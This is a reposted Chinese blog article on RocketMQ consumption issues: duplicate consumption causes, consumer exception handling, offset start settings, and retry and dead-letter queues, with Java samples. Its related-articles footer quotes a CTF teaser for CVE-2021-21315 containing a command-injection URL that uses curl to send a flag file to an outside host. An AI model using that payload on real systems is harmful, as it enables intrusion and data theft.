【Alibaba中间件技术系列】「RocketMQ技术专题」帮你梳理RocketMQ相关的消费问题以及原理分析总结

news2025/1/18 11:50:27

消息重复消费的问题

消息重复消费是各个MQ都会发生的常见问题之一,在一些比较敏感的场景下,重复消费会造成比较严重的后果,比如重复扣款等。

消息重复消费场景及解决办法

在什么情况下会发生RocketMQ的消息重复消费呢?

生产者重复发送场景

当系统的调用链路比较长的时候,比如,系统A调用系统B,系统B再把消息发送到RocketMQ中,在系统A调用系统B的时候。

如果系统B处理成功,但是迟迟没有将调用成功的结果返回给系统A的时候,系统A就会尝试重新发起请求给系统B,造成系统B重复处理,发起多条消息给RocketMQ造成重复消费。

消费者重复发送场景

在系统B发送消息给RocketMQ的时候,也有可能会发生和上面一样的问题,消息发送超时,结果系统B重试,导致RocketMQ接收到了重复的消息。

消费者重复发送场景

当RocketMQ成功接收到消息,并将消息交给消费者处理,如果消费者消费完成后还没来得及提交offset给RocketMQ,自己宕机或者重启了,那么RocketMQ没有接收到offset,就会认为消费失败了,会重发消息给消费者再次消费。

消费者没有立刻返回成功

重复消费的问题的一个可能的问题:消费者消费消息时产生了异常,并没有返回CONSUME_SUCCESS标志。

因为消息处理异常导致的消息重新消费,RocketMQ可以很好的保持消息,一定要消费成功才可以!

官方对comsumerMessage方法
It is not recommend to throw exception,rather than returning ConsumeConcurrentlyStatus.RECONSUME_LATER if consumption failure
复制代码

无论如何,都不要抛出异常,如果需要重新消费,可以返回RECONSUME_LATER主动要求重新消费。

catch Exception根异常来捕获业务处理的异常:

consumer.registerMessageListener(new MessageListenerConcurrently() {
                public ConsumeConcurrentlyStatus consumeMessage(List msgs,
                    ConsumeConcurrentlyContext context) {
                    logger.debug(Thread.currentThread().getName() + " Receive New Messages: " + msgs + "%n");
                    MessagePack msgpack = new MessagePack();
                    for (MessageExt msg : msgs){
                        byte[] data = msg.getBody();
                        try {
                            RTMsgPack rtmsg = msgpack.read(data, RTMsgPack.class);
                            logger.debug("Receive a message:" + rtmsg);
                            anlysisRTMsgPack(rtmsg, engine);
                        } catch (IOException e) {
                            logger.error("Unpack RTMsg:", e);
                        } catch (Exception e1){
                            logger.warn("Unexcepted exception.", e1);
                        }
                    }
                    logger.debug("RETURN CONSUME SUCCESS.");
                    return ConsumeConcurrentlyStatus.CONSUME_SUCCESS;
                }
 });
复制代码

设置CONSUME_FROM_LAST_OFFSET的问题

Consumer在消费时,会设置从哪里开始消费。默认是CONSUME_FROM_LAST_OFFSET,设置的值如代码所示。

public enum ConsumeFromWhere {

    CONSUME_FROM_LAST_OFFSET,

   CONSUME_FROM_LAST_OFFSET_AND_FROM_MIN_WHEN_BOOT_FIRST,

    CONSUME_FROM_MIN_OFFSET,

    CONSUME_FROM_MAX_OFFSET,

    CONSUME_FROM_FIRST_OFFSET,

    CONSUME_FROM_TIMESTAMP,
}
复制代码
  • CONSUME_FROM_LAST_OFFSET:从最后的偏移量开始消费,是从该消费者上次消费到的位置开始消费。
    • 如果是一个新的消费者,就要根据这个client所属的消费组的情况来判断。
    • 如果所属的消费者组是新上线的,订阅的消息,最早的消息都没有过,RocketMQ的设计者认为,你这是一个新上线的业务,会强制从第一条消息开始消费。
    • 如果订阅的消息,已经产生了过期消息,那么才会从我们这个client启动的时间点开始消费。

ConsumeFromWhere这个参数只对一个新的消费者第一次启动时有效

  • CONSUME_FROM_FIRST_OFFSET:从最小偏移量开始消费,
  • CONSUME_FROM_TIMESTAMP:从某个时间开始消费。
  • 而判断是不是一个新的ConsumerGroup是在broker端判断。
  • 消费到哪个offset最先是存在Consumer本地的,定时和broker同步自己的消费offset。
  • broker在判断是不是一个新的consumergroup,就是查broker端有没有这个consumergroup的offset记录。

偏移量无效化

对于一个新的queue,这个参数也是没用的,都是从0开始消费。

所以,这就有了一个问题我已经设置了CONSUME_FROM_LAST_OFFSET,为什么还是重复消费了,可能你这不是新的consumergroup,也可能是个新的Queue。

重试队列和死信队列

  • 消费端,一直不回传消费的结果。RocketMQ认为消息没收到,consumer下一次拉取,broker依然会发送该消息。
  • 任何异常都要捕获返回:ConsumeConcurrentlyStatus.RECONSUME_LATER

RocketMQ会放到重试队列,TOPIC是:%RETRY%+COnsumerGroup的名字

  • 重试的消息在延迟的某个时间点(默认是10秒,业务可设置)后,再次投递到这个ConsumerGroup。
  • 而如果一直这样重复消费都持续失败到一定次数(默认16次),就会投递到DLQ死信队列,此时需要人工干预了。

private int consumeMessageBatchMaxSize = 1;

private int pullBatchSize = 32;
复制代码
  • consumeMessageBatchMaxSize 是批量消费的最大条数
  • pullBatchSize 是每次拉取的最大条数

broker端的

private String messageDelayLevel = "1s 5s 10s 30s 1m 2m 3m 4m 5m 6m 7m 8m 9m 10m 20m 30m 1h 2h";
复制代码

参数是设置重试的时间,即第一次1s之后,第二次5s之后

生产环境不要改

messageDelayLevel = 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s 5s
复制代码

16次之后,多了一个topic名为:%DLQ%+consumergroup

这个默认的16次,可以改,但是使用DefaultMQPullConsumer才可以修改。

DefaultMQPushConsumer不能修改此值。

consumeMessageBatchMaxSize 这个size是消费者注册的回调listener一次处理的消息数,默认是1,不是每次拉取的消息数(默认是32),这个不要搞混。

消息消费进度的更新

未来的文章会进行介绍相关进度更新的功能和分析

分享资源

资源分享
获取以上资源请访问开源项目 点击跳转

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/884762.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

运动健身耳机什么的好、适合运动的耳机推荐

保持运动健身的习惯不仅成为一种生活态度,也逐渐演变为一种时尚潮流。随之而来的是越来越多的周边设备,旨在提高健身爱好者的运动效率。其中,运动耳机无疑是其中之一,不论是室内锻炼还是室外运动,一款舒适的运动耳机能…

【LeetCode75】第三十题 奇偶链表

目录 题目: 示例: 分析: 代码: 题目: 示例: 分析: 题目给我们一个链表,让我们把奇索引和偶索引的节点区分开来 ,参考示例给出的图我们应该就能很清晰地知道题目是什么…

第六章Tomcat部署以及优化

Tomcat: 开放源代码web应用服务器。(基于Java代码开发的),主要是处理动态请求和基于java代码进行页面开发。可以在html当中写入Java代码,Tomcat可以解析html页面当中的Java,执行动态请求,动态页…

春秋云镜 CVE-2021-21315

春秋云镜 CVE-2021-21315 systeminformation存在命令注入 靶标介绍 systeminformation是一个简单的查询系统和OS信息包。 启动场景 漏洞利用 exp /api/osinfo?param[]$(curl%20-d%20/flag%20xxx.ceye.io)登录ceye.io平台,curl请求 http://eci-2zed871sr7xrdjb…

Memory Analyzer(MAT)分析内存

关于作者:CSDN内容合伙人、技术专家, 从零开始做日活千万级APP。 专注于分享各领域原创系列文章 ,擅长java后端、移动开发、人工智能等,希望大家多多支持。 目录 一、导读二、概览三、 使用3.1 hprof 文件准备3.1.1 Android sutdi…

word之插入尾注+快速回到刚才编辑的地方

1-插入尾注 在编辑文档时,经常需要对一段话插入一段描述或者附件链接等,使用脚注经常因占用篇幅较大导致文档页面内容杂乱,这事可以使用快捷键 ControlaltD 即可在 整个行文的末尾插入尾注,这样文章整体干净整洁,需…

驾考笔记 _ 科目3 - 坂田线路图

深圳坂田线路图 1#线 >2#线 >3#线 > 1#线 > 2#线 > 3#线 > 简图:

Python random模块用法整理

随机数在计算机科学领域扮演着重要的角色,用于模拟真实世界的随机性、数据生成、密码学等多个领域。Python 中的 random 模块提供了丰富的随机数生成功能,本文整理了 random 模块的使用。 文章目录 Python random 模块注意事项Python random 模块的内置…

koa 使用 Mongoose 查询数据

Mongosee 操作符koa 使用 Mongoose 进行 翻页查询koa 使用 Mongoose 进行 多条件查询 mongosee 操作符 在使用 Koa 和 Mongoose 进行数据库查询时,你可以使用以下常用的操作符来构建查询条件: $eq:等于 示例:{ field: { $eq: valu…

pip install mysql出现error: subprocess - exited-with-error的解决方案

大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…

【Linux命令详解 | df命令】 df命令用于显示文件系统的磁盘空间使用情况,包括挂载点和可用空间

文章标题 简介一,参数列表二,使用介绍1. 查看整体磁盘空间使用情况2. 显示指定文件系统类型3. 查看inode信息4. 显示指定列5. 显示总计信息6. 检查特定文件系统空间使用情况7. 定期监控磁盘空间8. 了解磁盘配额9. 监控文件系统健康状态 结论 简介 在Lin…

如何快速更换有问题的PROFINET IO设备?

如何快速更换有问题的PROFINET IO设备? 一般情况下,更换PROFINET设备的步骤如下: 拆下有问题的PN 设备安装新设备打开博途软件在线分配设备名称和IP地址 那么,为了减少设备宕机时间,快速更换有问题的PN IO设备,我们可以采用以下的方法: PLC需支持无介质可更换设备的必需…

ICC2如何write_gds写出pr boundary

我正在「拾陆楼」和朋友们讨论有趣的话题,你⼀起来吧? 拾陆楼知识星球 在数模混合项目中,需要在前期确定pr boundary的尺寸,可以在virtuoso中画一个pr boundary存def给pr,当然,pr这边在前期修改尺寸也需要给负责模拟版图的同事确认,但ICC2 write gds默认是写不出pr bou…

TienChin 创建菜单页面

上一节当中我们只是给后台添加了对应的菜单,实际上对应的页面还没有存在这节主要就是创建出来页面: 促销活动: activity统计分析: analysis商机管理: business渠道管理: channel线索管理: clue合同管理: contract私教课程: course转派管理: transfer tem…

AMD Zen4撕裂者太霸气了!96核心功耗只有350W

AMD将在今年第三季度发布基于Zen4架构的新一代锐龙线程撕裂者,不但继续在核心数量、性能上碾压对手,还会升级到DDR5、PCIe 5.0。 在最新曝光的一份货物清单中,赫然可以看到三款新的撕裂者: - Threadripper 7995WX 350W…

动设备状态监测:智能化生产的关键利器

动设备状态监测正引领着工业生产的智能化转型。本文将深入探讨动设备状态监测的意义、PreMaint在其中的角色,以及如何实现智能化生产,提高生产效率和可靠性。 1. 动设备状态监测的重要性 随着制造业的发展,设备的状态监测变得至关重要。动设…

Java 中的 JIT 和 AOT

我们都知道,Java 是一种半编译型,半解释型的语言,其编译部分和 C 语言比较类似,解释部分和 Python 语言比较类似,而 Java 则是综合了两种方式的语言。 一、编译与解释 1.1 编译型语言 所谓编译,就是将程…

ClickHouse(二十):Clickhouse SQL DDL操作-2-分区表DDL操作

进入正文前,感谢宝子们订阅专题、点赞、评论、收藏!关注IT贫道,获取高质量博客内容! 🏡个人主页:含各种IT体系技术,IT贫道_Apache Doris,大数据OLAP体系技术栈,Kerberos安全认证-CSDN博客 &…

TienChin 引入 MyBatisPlus

在父工程当中添加版本号&#xff0c;统一管理&#xff1a; <mybatis-plus.version>3.5.1</mybatis-plus.version> 在父工程当中添加 MyBatisPlus 依赖&#xff1a; <!--MyBatis Plus--> <dependency><groupId>com.baomidou</groupId><a…

单链表相关操作(头插法和尾插法)

目录 1.尾插法建立单链表 带头结点 不带头节点 用户输入建立单链表 带头结点 不带头结点 2.头插法建立单链表 带头结点 用户输入建立单链表 带头结点 不带头结点 头插法和尾插法最大区别在于&#xff0c;尾插法可以顺序输出用户输入的元素&#xff0c;头插法则是逆序…